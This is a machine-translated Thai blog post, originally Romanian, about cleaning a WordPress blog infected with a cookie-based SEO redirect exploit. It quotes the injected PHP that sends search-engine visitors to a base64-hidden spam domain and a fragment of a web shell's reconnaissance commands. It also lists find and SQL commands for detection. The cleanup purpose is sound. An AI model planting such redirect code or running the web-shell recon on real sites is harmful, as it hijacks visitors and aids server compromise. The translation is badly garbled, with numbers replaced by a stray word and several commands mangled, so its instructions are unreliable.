Virus blogosphere … แต่คุณมีอะไรกับฉัน!

ในเดือนที่ผ่านมาผมได้รับการแจ้งเตือน ไวรัสในบล็อก จากผู้เข้าชมบางส่วน ตอนแรกผมไม่สนใจคำเตือนเพราะผมติดตั้งโปรแกรมป้องกันไวรัสที่ดีงาม (Kaspersky AV ฮิต) และเวลามากขึ้นนั่งบนบล็อกที่ฉันไม่เคยได้รับการแจ้งเตือนไวรัส (เดิม .. ผมเห็นอะไรบางอย่างที่น่าสงสัยว่าการฟื้นฟูครั้งแรกหายไป. ต่อไป ... )
ค่อยๆเร​​ิ่มปรากฏให้เห็นรูปแบบขนาดใหญ่ เข้าเยี่ยมชมหลังจากที่อัตราการเข้าชมเมื่อเร็ว ๆ นี้ได้ลดลงอย่างต่อเนื่องและเริ่มมีผู้คนมากขึ้นที่บอกผมว่า stealthsettingsด้วย. มันเป็น virused. เมื่อวานนี้ผมได้รับจากคนที่หน้าจอทำเมื่อโปรแกรมป้องกันไวรัสที่ถูกปิดกั้น ต้นฉบับ จาก stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. มันก็สวยเชื่อฉันที่ฉันใส่ค้นหาแหล่งที่มาทั้งหมด ความคิดแรกที่มาถึงใจของฉันคือการทำให้ อัพเกรด รุ่นล่าสุดของ WordPress (2.5.1) แต่ก่อนลบไฟล์ทั้งหมดในสคริปต์เก่า WordPress และเพื่อให้ ฐานข้อมูลสำรอง. ขั้นตอนนี้ใช้ไม่ได้ผลและอาจใช้เวลานานในการพิจารณาว่าจุดบกพร่องอยู่ที่ใดหากไม่ได้บอกฉัน eugen พูดคุยกาแฟเขาพบ ลิงค์ Google และมันจะดีที่จะเห็นเขา
MyDigitalLife.info เผยแพร่บทความชื่อ:“WordPress แฮ็ก: กู้คืนและแก้ไข Google และเสิร์ชเอ็นจิ้นหรือไม่มีการใช้คุกกี้ที่เปลี่ยนเส้นทางไปยัง Your-Needs.info, AnyResults.Net, Golden-Info.net และไซต์ที่ผิดกฎหมายอื่น ๆ"นั่นเป็นจุดสิ้นสุดของด้ายที่ฉันต้องการ
มันเป็นเรื่องของ เอาเปรียบ de WordPress ขึ้นอยู่กับคุกกี้ซึ่งผมคิดว่ามีความซับซ้อนมากและทำหนังสือเล่มนี้ ฉลาดพอที่จะทำให้ ด้วย SQL Injection บล็อกของฐานข้อมูล, เพื่อสร้างผู้ใช้ที่มองไม่เห็น การตรวจสอบตามปกติธรรมดา Dashboard->ผู้ใช้, ตรวจสอบไดเรกทอรีและไฟล์เซิร์ฟเวอร์ "เขียน" (ซึ่ง chmod ฮิต) ที่จะแสวงหาและ ดำเนินการ ไฟล์ที่มีสิทธิของผู้ใช้รากหรือกลุ่ม ผมไม่ทราบว่าที่ใช้ประโยชน์จากชื่อและที่เห็นว่ามีไม่กี่บทความที่เขียนเกี่ยวกับเขาแม้จะมีความจริงที่ว่าหลายบล็อกที่ติดเชื้อรวมทั้งโรมาเนีย ตกลง ... ฉันจะพยายามที่จะพยายามที่จะอธิบาย generalities เกี่ยวกับไวรัส

ไวรัสคืออะไร

ขั้นแรกให้ใส่แหล่งที่มาของหน้าในบล็อกการเชื่อมโยงกับผู้เข้าชมที่มองไม่เห็น แต่ที่มองเห็นและสามารถจัดทำดัชนีสำหรับเครื่องมือค้นหาโดยเฉพาะอย่างยิ่งของ Google อย่างนี้ เว็บไซต์โอน Page Rank ระบุโดยโจมตี. ประการที่สองอีกอันหนึ่งถูกแทรก รหัสการเปลี่ยนเส้นทาง URL สำหรับผู้เข้าชมที่มาจาก Google, สด, Yahoo, ... หรืออ่าน RSS และไม่ได้เป็นเว็บไซต์ คุกกี้. โปรแกรมป้องกันไวรัส ตรวจพบการเปลี่ยนเส้นทางเป็น Trojan-Clicker.HTML.

อาการ:

ลดลงมากในการเข้าเยี่ยมชมโดยเฉพาะอย่างยิ่งในบล็อกที่ผู้เข้าชมส่วนใหญ่มาจาก Google

บัตรประจำตัว: (สิ่งนี้ทำให้ปัญหาซับซ้อนสำหรับผู้ที่ไม่มีความคิดเกี่ยวกับ phpmyadmin, php และ linux)

LA คำเตือน! ก่อนให้ฐานข้อมูลสำรอง!

ฮิต ตรวจสอบไฟล์ที่มา index.php, header.php, footer.php, รูปแบบบล็อกและดูว่ามีรหัสที่ใช้การเข้ารหัส base64 หรือมี“ if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0)” ในรูปแบบ:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

หรือสิ่งที่ ... ลบรหัสนี้!

คลิกที่ภาพ ...

รหัสดัชนี

ในภาพหน้าจอด้านบนฉันบังเอิญเลือกและ " ". รหัสนั้นจะต้องยังคงอยู่

ฮิต การใช้ phpMyAdmin และไปที่ตารางฐานข้อมูล wp_usersสถานที่ที่จะตรวจสอบว่ามีชื่อผู้ใช้ไม่ถูกสร้างใน 00:00:00 0000-00-00 (ที่เป็นไปได้ในด้านการ user_login เขียน "WordPress” จด ID ผู้ใช้รายนี้ (ช่อง ID) แล้วลบทิ้ง

คลิกที่ภาพ ...

ผู้ใช้ปลอม

* สายสีเขียวจะถูกลบออกและเก็บ ID ของเขา ในกรณีของ ง่วงนอนเป็น ID = ฮิต .

ฮิต ไปที่ตาราง wp_usermeta, ที่ ตั้งอยู่ และ เอาออก สาย ID ที่เกี่ยวข้อง (ในกรณีที่สนาม user_id ค่า ID ปรากฏลบ)

ฮิต ตาราง wp_optionไปที่ active_plugins และดูว่ามีการใช้งานปลั๊กอินผู้ต้องสงสัย มันสามารถนำมาใช้เช่นตอนจบ _old.giff, _old.pngg, _old.jpeg, _new.php.giffฯลฯ การรวมกันของส่วนขยายรูปภาพที่สมบูรณ์กับ _old และ _new

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

ลบปลั๊กอินนี้จากนั้นไปที่บล็อก -> แดชบอร์ด -> ปลั๊กอินที่คุณปิดใช้งานและเปิดใช้งานปลั๊กอินใด ๆ

คลิกที่ภาพเพื่อดูว่าไฟล์ไวรัสปรากฏ active_plugins

เสียบเข้าไป

ติดตามเส้นทาง FTP หรือ SSH และลบไฟล์ที่ระบุไว้ในเซิร์ฟเวอร์ active_plugins

5. ทีโอทีใน phpMyAdmin, ในตาราง wp_option, ค้นหาและลบแถวที่มี "rss_f541b3abd05e7962fcab37737f40fad8"และในหมู่"internal_links_cache ".
ในการเชื่อมโยง internal_links_cache สแปมที่มีการเข้ารหัสที่ปรากฏในบล็อกและ รหัส Google Adsense, ของแฮ็กเกอร์

ฮิต แนะนำคือการ เปลี่ยนรหัสผ่าน บล็อกและเข้าสู่ระบบ ลบทั้งหมด userele ที่น่าสงสัย. อัปเกรดเป็นเวอร์ชันล่าสุดของ WordPress และตั้งค่าบล็อกไม่ให้ผู้ใช้ใหม่ลงทะเบียนอีกต่อไป ไม่มีการสูญเสีย… สามารถแสดงความคิดเห็นไม่มีใครอยู่

ฉันพยายามอธิบายข้างต้นเล็กน้อยว่าจะทำอย่างไรในสถานการณ์เช่นนี้เพื่อทำความสะอาดบล็อกของไวรัสนี้ ปัญหานี้ร้ายแรงกว่าที่คิดและไม่สามารถแก้ไขได้เกือบทั้งหมดเนื่องจากใช้ ช่องโหว่ความปลอดภัย โฮสติ้งเว็บเซิร์ฟเวอร์ซึ่งเป็นบล็อก

ในฐานะที่เป็นวัดแรกของการรักษาความปลอดภัยที่มีการเข้าถึง SSH, ให้ตรวจสอบบางอย่างบนเซิร์ฟเวอร์เพื่อดูว่ามีไฟล์เช่น * _old * และ * _new. * ด้วยตอนจบGiff jpeg.. pngg. jpgg. ไฟล์เหล่านี้จะถูกลบออก หากคุณเปลี่ยนชื่อไฟล์ตัวอย่างเช่น top_right_old.giff in top_right_old.phpเราจะเห็นว่าไฟล์ที่ว่าเซิร์ฟเวอร์รหัสใช้ประโยชน์

คำแนะนำที่เป็นประโยชน์สำหรับการตรวจสอบทำความสะอาดและการรักษาความปลอดภัยเซิร์ฟเวอร์ (ผ่าน SSH)

1.  cd / tmp และตรวจสอบโฟลเดอร์เช่น tmpVFlma หรืออื่น ๆ ที่ชื่อเหมือนกันและลบมัน ดูภาพด้านล่างสองโฟลเดอร์ดังกล่าวเพื่อฉัน:

tmpserver

RM-RF ชื่อโฟลเดอร์

ฮิต ตรวจสอบ elimiati (เปลี่ยน chmod) เป็นคุณลักษณะโฟลเดอร์ที่เป็นไปได้ chmod ฮิต

หาเขียนได้ทั้งหมด files ใน dir ปัจจุบัน: หา -Type-f-ดัดฮิตคำสั่ง ls-
หาไดเรกทอรีที่สามารถเขียนได้ใน dir ปัจจุบัน หา -Type-d-ดัดฮิตคำสั่ง ls-
ค้นหาไดเรกทอรีที่สามารถเขียนได้ทั้งหมดและ files ใน dir ปัจจุบัน: หา -Perm-ฮิตคำสั่ง ls-

ฮิต มองหาไฟล์ที่น่าสงสัยบนเซิร์ฟเวอร์

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, คำเตือน! แฟ้มที่ถูกตั้งบิต SUID si SGID. ไฟล์เหล่านี้ดำเนินการด้วยสิทธิของผู้ใช้ (กลุ่ม) หรือรากที่ไม่ได้ใช้ดำเนินการแฟ้ม ไฟล์เหล่านี้สามารถนำไปสู่​​การประนีประนอมรากถ้ามีปัญหาด้านความปลอดภัย ถ้าคุณใช้ไฟล์ที่มีและ SGID บิตดำเนินการ 'chmod ฮิต " หรือถอนการติดตั้งแพคเกจที่มีพวกเขา

มีประโยชน์ในบางส่วนของแหล่งที่มา ...

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

ด้วยวิธีนี้ ... โดยทั่วไปพบว่าการละเมิดในการรักษาความปลอดภัย ไฟล์พอร์ตไดเรกทอรีเปิด "เขียน" และการดำเนินการของกลุ่มสิทธิพิเศษ / ราก

กลับมาพร้อมกับเพิ่มเติม ...

บล็อกบางที่ติดเชื้อ: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
รถจักรยานยนต์.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... รายการไปใน ... มาก

คุณสามารถตรวจสอบว่าบล็อกติดไวรัสหรือไม่โดยใช้เครื่องมือค้นหาของ Google คัดลอกวาง:

เว็บไซต์: www.blegoo.com ซื้อ

ราตรีสวัสดิ์และทำงานดีๆนะครับ;) เร็ว ๆ นี้ผมคิดว่า Eugen จะมาพร้อมกับข่าวสารทาง prevezibil.imprevizibil.com

BRB :)

ความสนใจ! เปลี่ยนธีมของ WordPress หรืออัพเกรดเป็น WordPress 2.5.1 ไม่ใช่วิธีแก้ปัญหาเพื่อกำจัดไวรัสนี้

Stealth

หลงใหลในเทคโนโลยี ฉันชอบทดสอบและเขียนบทช่วยสอนเกี่ยวกับระบบปฏิบัติการ macOS, Linux, Windows, เกี่ยวกับ WordPress, WooCommerce และกำหนดค่าเว็บเซิร์ฟเวอร์ LEMP (Linux, NGINX, MySQL และ PHP) ฉันเขียนบน StealthSettings.com ตั้งแต่ปี 2006 และไม่กี่ปีต่อมา ฉันเริ่มเขียนบทแนะนำและข่าวสารเกี่ยวกับอุปกรณ์ในระบบนิเวศ iHowTo.Tips Apple: iPhone, iPad, Apple ดู, โฮมพอด, iMac, MacBook, AirPods และอุปกรณ์เสริม

เขียนความเห็น

อีเมลของคุณ address จะไม่ถูกเผยแพร่

บทความที่เกี่ยวข้อง

/ / / / / / /
คีย์เวิร์ด: / / / / / / /
กลับไปด้านบนปุ่ม